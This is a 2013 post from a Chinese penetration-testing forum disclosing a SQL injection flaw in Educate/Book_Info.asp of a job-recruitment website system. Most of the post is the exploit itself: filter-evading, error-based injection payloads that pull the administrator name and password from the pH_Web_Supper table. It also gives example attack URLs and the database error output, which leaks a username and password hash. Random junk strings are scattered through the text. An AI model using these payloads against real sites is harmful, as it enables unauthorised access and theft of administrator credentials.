中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:56
标题:
网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp
' q" P" {! v' u9 b3 t1 @$ B
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
! D$ r1 S5 U/ B
exp:如下
) ^/ y }% @5 @* j, b* v
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& H9 B1 p$ n6 S1 u
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
8 e. P2 g! B1 _: q4 o* O
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 d" l3 {( y+ g! [3 q) P
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
: h+ N1 p6 {9 A
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
8 w) H; l p- }; t- s3 V2 O
/Educate/Book_Info.asp,行 8
% j6 K9 m+ c+ D. E: x8 V4 u) t
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" T+ Y, a7 P$ w5 C
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
7 _; }2 J! U$ @" j* d+ A3 F
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
* M* a& W+ s1 D2 j2 B7 ~
/Educate/Book_Info.asp,行 8
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2